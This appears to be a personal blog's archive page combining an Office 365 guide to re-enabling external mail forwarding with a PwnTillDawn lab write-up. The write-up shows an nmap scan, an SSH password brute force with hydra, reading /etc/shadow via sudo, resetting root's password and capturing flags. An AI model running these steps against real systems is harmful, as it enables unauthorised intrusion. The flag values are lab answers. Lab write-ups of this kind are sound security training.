Month: January 2021
Protected: ptd-brandy-private
Protected: htb-cereal-nl
I used to have an auto forward set up on my mail account in Office365. However, since a few weeks I encountered the following errors:
Your message wasn’t delivered because the recipient’s email provider rejected it.
and
Remote Server returned ‘550 5.7.520 Access denied, Your organization does not allow external forwarding. Please contact your administrator for further assistance. AS(7555)’
The result of these error messages was that my emails were no longer automatically forwarded to another mailbox.
Before September 2020, Office 365 allowed emails to be automatically forwarded to external email addresses. This is called “External forwarding”. However, since September 2020, a setting has been changed, whereby External Forwarding is disabled by default at the organization level. This means that all mail that was previously neatly forwarded to an external email address is now suddenly blocked. The affected mailbox, the mailbox with the forwarding rule set up, receives the error “Your message wasn’t delivered because the recipient’s email provider rejected it.“
How to fix Remote Server returned ‘550 5.7.520 Access denied
An Office 365 administrator can adjust the default setting in the Office 365 environment, making it possible to forward mail externally again. If you are a user of Office 365, please ask your IT Admin to adjust the setting and send him or her the URL of this web page.
If you are an administrator, follow these steps to re-enable External Forwarding:
- Go to the Office365 Security and Compliance Dashboard
- Expand Threat Management and click Policy
- Click Anti Spam
- In the Anti-Spam settings, locate Outbound spam filter policy (Always ON) and click Edit policy
- In the Outbound spam filter policy, expand Automatic Forwarding. The default is set to Automatic – System-controlled.
- Select On – Forwarding is enabled and click Save. Forwarding to external mail addresses is now allowed. Note Microsoft says it may take up to 24 hours before the change takes effect. Although it took 5 minutes in my case 🙂
. A setting to rethink – Automatic Forwarding to external email addresses
You may wonder whether it is a good idea to change the default setting for automatic forwarding to external addresses.
One reason for not allowing it is data loss prevention. Recently I was with a customer whose password had been leaked. Hackers have gained access to his mailbox. Instead of directly using his mailbox, they set – unnoticed – a rule that automatically forwarded all mail to an external email address. A good example of corporate espionage.
Protected: htb-jetfortress-nl
Protected: ptd-snare-private
Protected: htb-tenet-nl
ptd-stuntmanmike-private
https://online.pwntilldawn.com/Achievements/Details/1/1438
.
As always we start with a nmap scan
┌─[user@parrot-virtual]─[~/ptd] └──╼ $nmap -A 10.150.150.166 Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-15 09:59 GMT Nmap scan report for 10.150.150.166 Host is up (0.032s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 (protocol 2.0) | ssh-hostkey: | 2048 b7:9e:99:ed:7e:e0:d5:83:ad:c9:ba:7c:f1:bc:44:06 (RSA) | 256 7e:53:59:7b:2d:6c:3b:d7:21:28:cb:cb:78:af:99:78 (ECDSA) |_ 256 c5:d2:2d:04:f9:69:40:4c:15:34:36:fe:83:1f:f3:44 (ED25519) 8089/tcp open ssl/http Splunkd httpd | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Splunkd |_http-title: splunkd | ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser | Not valid before: 2019-10-25T09:15:13 |_Not valid after: 2022-10-24T09:15:13 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 40.55 seconds
┌─[✗]─[root@parrot-virtual]─[/home/user/ptd] └──╼ #ssh root@10.150.150.166 You are attempting to login to stuntman mike's server - FLAG35=724a2734e80ddbd78b2694dc5eb74db395403360 root@10.150.150.166's password:
┌─[root@parrot-virtual]─[/home/user/ptd]
└──╼ #hydra -l mike -P /usr/share/wordlists/rockyou.txt ssh://10.150.150.166
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-26 11:29:44
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.150.150.166:22/
[22][ssh] host: 10.150.150.166 login: mike password: babygirl
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-26 11:29:51
┌─[✗]─[root@parrot-virtual]─[/home/user/ptd]
mike@stuntmanmike:~$ cat FLAG36 8cff2cce1a88a54db986d968a4b7a66fb3588c20 mike@stuntmanmike:~$ sudo -l Matching Defaults entries for mike on stuntmanmike: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User mike may run the following commands on stuntmanmike: (ALL : ALL) ALL mike@stuntmanmike:~$ groups mike adm cdrom sudo dip plugdev lxd mike@stuntmanmike:~$ sudo cat /etc/shadow root:*:17941:0:99999:7::: --snip-- sshd:*:18043:0:99999:7::: mike:$6$4ytsdVARn//SY.7x$ZNJHsx3CHR3zCU91Q.3RjHDK4hZ72GIT5.n/ygetAZ3Armybjj.l6QMb5PAvidEHvgGRipOcycOTnU8ePzwEl1:18043:0:99999:7::: splunk:!:18194:0:99999:7::: mike@stuntmanmike:/$ sudo passwd root Enter new UNIX password: Retype new UNIX password: passwd: password updated successfully mike@stuntmanmike:/$ su root Password: root@stuntmanmike:/# cd /root root@stuntmanmike:~# cat FLAG37 28d10397e475a50fc0d6c73f7c23355ebdf15a3f
.
However, if you see the following in the “Write-Up” box, you can publish online the explanations of how you compromised that box but we ask you in return to give us credit for the machines by adding backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.